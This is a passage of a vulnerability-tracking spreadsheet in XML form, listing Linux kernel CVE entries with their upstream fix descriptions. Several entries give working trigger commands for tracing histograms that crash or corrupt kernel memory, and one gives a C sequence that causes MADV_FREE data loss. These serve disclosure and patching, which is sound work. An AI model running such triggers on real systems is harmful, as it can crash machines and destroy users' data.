ALSA: usbusx2y: fix in04_last array size mismatch with in04_buf
The in04_last array in struct usx2ydev is declared as char[24], but
in04_buf is allocated as sizeof(struct us428_ctls) which is 21 bytes.
In i_usx2y_in04_int(), when ctl_snapshot_last == -2 (initialization
path):
    memcpy(usx2y-&gt;in04_last, usx2y-&gt;in04_buf, sizeof(usx2y-&gt;in04_last));
This copies 24 bytes from a 21-byte slab allocation, reading 3 bytes
past the end of the source object.
Introduce a USX2Y_IN04_SIZE constant defined as sizeof(struct
us428_ctls) and use it consistently for the in04_last array, the
in04_buf allocation, the URB transfer length, and the comparison loop,
replacing the bare 24 and 21 literals throughout.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97930</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97932</t>
        </is>
      </c>
      <c r="D578" s="5" t="inlineStr"/>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="inlineStr"/>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr"/>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Don't dereference trace_event_file in deferred trigger free
The enable_event trigger defers trace_event_put_ref() to the
trigger free kthread, but the trace_event_file can already be freed
when the instance is removed.
Keep the trace_event_call directly in enable_trigger_data so the
deferred free does not access the freed trace_event_file.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97932</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97933</t>
        </is>
      </c>
      <c r="D579" s="5" t="inlineStr"/>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="inlineStr"/>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr"/>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take trace_array reference when opening a tracer options file
When a tracer option file is opened, it is passed a descriptor that points
to an element on the trace_array's topts array. This element has
information to find the trace array and other information. It uses this
element to take a reference of the trace_array so that the trace_array
does not get removed while this file is opened.
Unfortunately, there's a race condition where the element itself could be
freed by the removal of the instance the trace_array represents causing a
use-after-free as this element that is used to find the trace_array to
increment its reference counter is also freed when the instance is
removed.
To solve this, add a trace_array_tracer_options_get() helper function that
will take the address of the element that is passed to the open function
by the inode-&gt;i_private pointer and search all the trace_arrays under a
lock to find the one that the element's address is in the range of the
trace_arrays topts array elements. When a match happens, that trace_array's
reference would be increased.
Note, there's a race where if an admin was deleting and creating trace
instances at the same time and the memory of the old trace_array's array
matched the memory of the new trace_array that it could in theory open the
option from the wrong trace array. But we do not care because it would be
stupid to perform that kind of action. As long as the only thing that can
happen is that the option from the wrong trace array is used and doesn't
crash the kernel it will only make the user confused. But if they are
doing something stupid like this, they are already confused, so no harm
done.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97933</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97934</t>
        </is>
      </c>
      <c r="D580" s="5" t="inlineStr"/>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="inlineStr"/>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr"/>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix memory corruption from a "STACKTRACE" histogram key
"cpu", "CPU", "stacktrace" and "STACKTRACE" are generic fields, defined
with an offset and a size of zero so that the filter code can match them
by name. parse_field() maps them onto their common_* equivalents for
backward compatibility, but unlike the common_* names it hands the
placeholder back to the caller instead of NULL.
create_hist_field() takes a non-NULL field as a promise that the record
carries a stacktrace and picks HIST_FIELD_FN_STACK, so the __data_loc
word is read from offset 0, that is from common_type, and its low 16
bits are followed as an offset into the record. What is found there
becomes the length of an unbounded memcpy. Pick an event whose id is
small enough that the offset stays inside its own record and the length
is a kernel text address:
  # cd /sys/kernel/tracing
  # echo 'hist:keys=STACKTRACE' &gt; events/ftrace/print/trigger
  # echo hello &gt; trace_marker
  Oops: general protection fault, probably for non-canonical address
  RIP: 0010:rb_next+0x23/0x60
   &lt;/IRQ&gt;
  RIP: 0010:memcpy+0xc/0x30
   event_hist_trigger+0x2e7/0x12c0
  Kernel panic - not syncing: Fatal exception in interrupt
Leave the field NULL, which is what the comment above the branch says
the code does and what common_stacktrace already does. FILTER_CPU and
FILTER_COMM are left alone, their create_hist_field() branches never
look at the field.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97934</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97935</t>
        </is>
      </c>
      <c r="D581" s="5" t="inlineStr"/>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="inlineStr"/>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr"/>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Set the trace clock before registering the histogram trigger
hist_register_trigger() puts the trigger on the global named_triggers
list in cmd_ops-&gt;init(), and only then sets the trace clock:
	if (data-&gt;cmd_ops-&gt;init) {
		ret = data-&gt;cmd_ops-&gt;init(data);
		if (ret &lt; 0)
			goto out;
	}
	if (hist_data-&gt;enable_timestamps) {
		ret = tracing_set_clock(file-&gt;tr, hist_data-&gt;attrs-&gt;clock);
		if (ret) {
			hist_err(tr, HIST_ERR_SET_CLOCK_FAIL, errpos(clock));
			goto out;
		}
The clock string is not checked anywhere before that call, so a named
trigger using common_timestamp with an unknown clock fails after it has
already become findable. event_hist_trigger_parse() then frees it
without taking it off the list, and the next lookup by name reads the
freed object:
 ~# cd /sys/kernel/tracing/events/sched/sched_switch
 ~# echo 'hist:name=foo:keys=common_pid:ts=common_timestamp:clock=bogus' &gt; trigger
 bash: echo: write error: Invalid argument
 ~# echo 'hist:name=foo:keys=common_pid' &gt; trigger
  BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
  Read of size 8 at addr ffff88800915d760 by task init/1
   find_named_trigger+0xac/0xc0
   hist_register_trigger+0xc1/0x900
   event_hist_trigger_parse+0x3146/0x6af0
   event_trigger_write+0xce/0x160
  Freed by task 63:
   kfree+0x154/0x420
   trigger_kthread_fn+0xfd/0x160
Set the clock before the trigger is registered, so that nothing which
can fail runs after it is published, the way commit 6f86bdeab633
("tracing: Fix bad hist from corrupting named_triggers list") moved the
registration below the rest of the setup.
tracing_set_filter_buffering() is reference counted, so the init failure
path has to drop the reference that the clock block now takes first.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97935</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97936</t>
        </is>
      </c>
      <c r="D582" s="5" t="inlineStr"/>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="inlineStr"/>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr"/>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix memory corruption from the histogram stacktrace modifier
parse_field() sets HIST_FIELD_FL_STACKTRACE from the ".stacktrace"
modifier before it looks the field name up, and nothing afterwards
checks that the name resolved to a field which holds a stacktrace.
create_hist_field() picks HIST_FIELD_FN_STACK on the strength of the
field pointer alone, which reads a __data_loc word from the record and
follows its low 16 bits as an offset into the same record.
event_hist_trigger() takes the first word there as an entry count and
copies that many longs into a 31 entry array:
	n_entries = *stack;
	memcpy(entries, ++stack, n_entries * sizeof(unsigned long));
Neither end of that copy is bounded, and the count is whatever the event
holds at the offset, so any field will do:
  # cd /sys/kernel/tracing/events/sched/sched_process_fork
  # echo 'hist:keys=parent_pid.stacktrace' &gt; trigger
  # (true)
  BUG: kernel NULL pointer dereference, address: 0000000000000008
  RIP: 0010:rb_insert_color+0x18/0x130
   timerqueue_linked_add+0x7e/0xd0
   enqueue_hrtimer+0x39/0xb0
   __hrtimer_run_queues+0x10f/0x1f0
   &lt;/IRQ&gt;
  RIP: 0010:memcpy+0xc/0x30
   event_hist_trigger+0x165/0x690
The timer interrupt landed on the rbtree the copy had already run over.
No debug options are needed for this; KASAN reports the same write as an
out-of-bounds read of 13835058055416381440 bytes.
Documentation/trace/histogram.rst already states the rule, "must be a
long[] type", so enforce it once the name has been resolved. Names which
resolve to no field at all, "hitcount.stacktrace" and the common_*
pseudo-fields, are refused for the same reason: they hold no stacktrace
to read.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97936</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97938</t>
        </is>
      </c>
      <c r="D583" s="5" t="inlineStr"/>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="inlineStr"/>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr"/>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
reboot: fix cad_pid use-after-free race
cad_pid is a single kernel-wide struct pid pointer. proc_do_cad_pid()
reads it and passes it to pid_vnr() without protecting the lifetime of
the referenced struct pid. A concurrent writer can replace cad_pid and
drop the final reference to the old struct pid after the reader has
loaded the pointer but before pid_vnr() has finished dereferencing it,
causing a use-after-free.
kill_cad_pid() has the same lifetime race when it passes cad_pid to
kill_pid().
At the time this issue was reported, an unprivileged user could reach the
sysctl through user and PID namespaces because cad_pid was registered in
pid_table[]. Moving cad_pid back to the global reboot sysctl table
corrected that namespace and permission mismatch, but did not fix the
underlying lifetime race.
Fix this by treating cad_pid as an RCU-protected pointer at both read
sites and by waiting for a grace period before dropping the old reference
on the write side.
call_rcu(&amp;old_pid-&gt;rcu, ...) cannot be used here because free_pid()
also queues pid-&gt;rcu; queueing the same rcu_head twice can corrupt the
RCU callback list.
Original KASAN crash stack:
  kernel/pid.c:545 pid_nr_ns()        # reads freed pid-&gt;level
  kernel/pid.c:556 pid_vnr()          # calls pid_nr_ns()
  kernel/pid.c:775 proc_do_cad_pid()  # calls pid_vnr(cad_pid)</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97938</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97939</t>
        </is>
      </c>
      <c r="D584" s="5" t="inlineStr"/>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="inlineStr"/>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr"/>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmr: account multicast table and route memory
A netadmin in a user+net namespace can create many IPv4 and IPv6
multicast routing tables with MRT_TABLE and MRT6_TABLE. Each unseen
id allocates an mr_table via the shared mr_table_alloc(), links it
into the per-net list, and leaves it until netns teardown. Those
objects were not charged to memcg, so the host unreclaimable slab
grows with the table count.
Account mr_table allocations with GFP_KERNEL_ACCOUNT and mark the
IPv4/IPv6 MFC caches SLAB_ACCOUNT. This matches the established
handling of IP addresses, routes and alternate interface names.
Unresolved MFC entries are still allocated from softIRQ with
GFP_ATOMIC and are not charged. They expire after 10 seconds and are
bounded by the socket receive queue; see commit 0079ad8e8dc3
("ipmr: remove hard code cache_resolve_queue_len limit").</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97939</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97942</t>
        </is>
      </c>
      <c r="D585" s="5" t="inlineStr"/>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="inlineStr"/>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr"/>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/alternatives: Exclude text poking against change_page_attr()
From time to time, the following BUG can be observed
in the x86 alternatives patching code [0]:
  &gt; kernel BUG at arch/x86/kernel/alternative.c:2576!
  &gt; Oops: invalid opcode: 0000 [#1] SMP NOPTI
  &gt; CPU: 0 UID: 0 PID: 355 Comm: (udev-worker) Not tainted 7.1.3-1-default #1 PREEMPT(full) openSUSE Tumbleweed  8c1795b03ec64f997e57a8ad38b1161e3b98da64
  &gt; Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS unknown 02/02/2022
  &gt; RIP: 0010:__text_poke+0x2aa/0x450
  &gt; Call Trace:
  &gt;  &lt;TASK&gt;
  &gt;  smp_text_poke_batch_finish+0x2a7/0x320
  &gt;  __static_call_transform+0xb7/0x220
  &gt;  arch_static_call_transform+0x5b/0xb0
  &gt;  __static_call_init+0xe9/0x270
  &gt;  static_call_module_notify+0x11f/0x150
  &gt;  notifier_call_chain+0x61/0xe0
  &gt;  blocking_notifier_call_chain_robust+0x63/0xc0
  &gt;  load_module+0x1c92/0x20c0
  &gt;  init_module_from_file+0xd8/0x140
  &gt;  idempotent_init_module+0x100/0x2f0
  &gt;  __x64_sys_finit_module+0x71/0xe0
  &gt;  do_syscall_64+0xe1/0x610
  &gt;  entry_SYSCALL_64_after_hwframe+0x76/0x7e
which matches the following BUG_ON() in alternative.c:
	/*
	 * If something went wrong, crash and burn since recovery paths are not
	 * implemented.
	 */
	BUG_ON(!pages[0] || (cross_page_boundary &amp;&amp; !pages[1]));
This can happen if vmalloc_to_page() fails, for any reason. Such can happen
if text poking races with CPA, which can possibly result in the collapsing
of page tables (or breaking of PMD hugepages). It is not a problem for most
users of vmalloc_to_page() (they solely own the vmalloc'd range) but, when
CONFIG_ARCH_HAS_EXECMEM_ROX=y, various modules own a single execmem vmalloc
range, and can call set_memory_*() in parallel on it. This can happen to
race against __text_poke and cause havoc in vmalloc_to_page().
Fix it by excluding against CPA using the init_mm mmap read lock.
[ dhansen: Fix up SoB ordering. The actual code flow here was:
	   Pedro=&gt;Lorenzo=&gt;Mike=&gt;Me which is reflected in the SoB chain
	   now. I *believe* Mike simply picked up Lorenzo's update to
	   Pedro's post from the Link ]</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97942</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97943</t>
        </is>
      </c>
      <c r="D586" s="5" t="inlineStr"/>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="inlineStr"/>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr"/>
      <c r="L586" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr"/>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Acquire init_mm write lock on collapse to avoid UAF
x86 implements page attribute modification using its Change Page
Attributes (CPA) mechanism.
This tracks properties of ranges such as cache mode through x86 page
attributes, and as part of that logic manipulates kernel page tables.
Since commit:
  41d88484c71c ("x86/mm/pat: restore large ROX pages after fragmentation")
ranges of kernel page table entries can be collapsed into
huge page table entries as part of this logic.
As part of this collapse, it frees the page tables which the collapsed
entries previously pointed to, and it does so without any relevant locks
being held to preclude concurrent kernel page table walkers.
The only way this code can be reached is if CPA_COLLAPSE is specified, and
this is only set in set_memory_rox() via:
set_memory_rox()
-&gt; change_page_attr_set_clr()
-&gt; cpa_flush()
-&gt; cpa_collapse_large_pages()
Notable users of this are execmem and BPF when manipulating executable
mappings.
However, this is problematic for ptdump as it walks ranges it does not own
and thus runs the risk of a use-after-free on page tables freed underneath
it.
In addition, concurrent CPA collapse operations are possible which can also
cause races.
Resolve the issue by acquiring the mmap write lock on init_mm across the
whole operation.
It is safe to acquire a sleeping lock as all the callers invoke
set_memory_rox() from process context and in any case,
change_page_attr_set_clr() calls vm_unmap_alias() which ultimately takes a
mutex, disallowing atomic context here.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97943</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97944</t>
        </is>
      </c>
      <c r="D587" s="5" t="inlineStr"/>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="inlineStr"/>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr"/>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr"/>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/cfi: Fix FineIBT hash offset in cfi_get_func_hash()
The switch of the FineIBT preamble from "subl $hash, %r10d" to the
shorter "subl $hash, %eax" moved the hash immediate from offset 7 to
offset 5 of the preamble. fineibt_preamble_hash was updated to match,
but the open-coded offset in cfi_get_func_hash() was missed and it
still reads the hash at offset 7.
cfi_get_func_hash() is used by the BPF JIT to give a struct_ops
trampoline the CFI hash of the stub function it stands in for. With
FineIBT the trampoline now gets the upper half of the real hash
followed by the first two bytes of the next instruction, so the first
indirect call from the kernel into a struct_ops program,
tcp_init_congestion_control() calling -&gt;init() of a BPF congestion
control for example, fails the FineIBT check and the kernel dies with
a CFI failure.
Move the FineIBT preamble template and its offset defines above
cfi_get_func_hash() and use fineibt_preamble_hash there, so every
reader of the preamble shares one definition of its layout. The
CFI_FINEIBT arm is only built with CONFIG_FINEIBT, the only
configuration in which cfi_mode can take that value.
cfi_get_func_arity() does not need the same treatment: the __bhi_args
call whose displacement it reads still ends at the function address.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97944</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97945</t>
        </is>
      </c>
      <c r="D588" s="5" t="inlineStr"/>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="inlineStr"/>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr">
        <is>
          <t>hp</t>
        </is>
      </c>
      <c r="K588" s="5" t="inlineStr"/>
      <c r="L588" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr"/>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm: Fix user-space data loss with MADV_FREE and THP
Some of users of Polars (a data analytics library) have lost production
data from this bug. They seem to have just the right combination of
huge pages, MADV_FREE and heavy reclaim pressure.
pmd_modify() masks the old value with (_HPAGE_CHG_MASK &amp; ~_PAGE_DIRTY),
silently discarding the hardware dirty bit.  The subsequent
pmd_mksaveddirty() call is supposed to transfer _PAGE_DIRTY into
_PAGE_SAVED_DIRTY when write-protecting, but the dirty bit was already
stripped from the value, so there is nothing left to transfer.
Contrast with pte_modify(), which keeps _PAGE_DIRTY_BITS in its mask,
and pud_modify(), which keeps _HPAGE_CHG_MASK untouched: pmd_modify()
is the odd one out.  Any pmd_modify() on a writable, dirty PMD loses
the dirty state.
One visible consequence is data loss with MADV_FREE on PMD-mapped THP:
    memset(buf, 0x5A, size);          // PMD-mapped THP, PMD dirty
    madvise(buf, size, MADV_FREE);    // PMD cleaned but left writable,
                                      // folio marked lazyfree
    memset(buf, 0x5A, size);          // hardware sets _PAGE_DIRTY again
    mprotect(buf, size, PROT_READ);   // pmd_modify() drops the dirty bit
    mprotect(buf, size, PROT_READ|PROT_WRITE);
    // ... memory pressure ...
Reclaim (e.g. under memcg pressure) then finds the lazyfree folio with
no dirty bit set anywhere and frees it in
__discard_anon_folio_pmd_locked(), even though the data was rewritten
after MADV_FREE; subsequent reads fault in fresh zero pages.  NUMA
hinting alone can trigger the same loss, as do_huge_pmd_numa_page()
restores the PMD through pmd_modify() as well.
PMD-mapped file THPs are affected too: mprotect()/NUMA hinting dropping
the dirty bit means rewritten data is never written back.
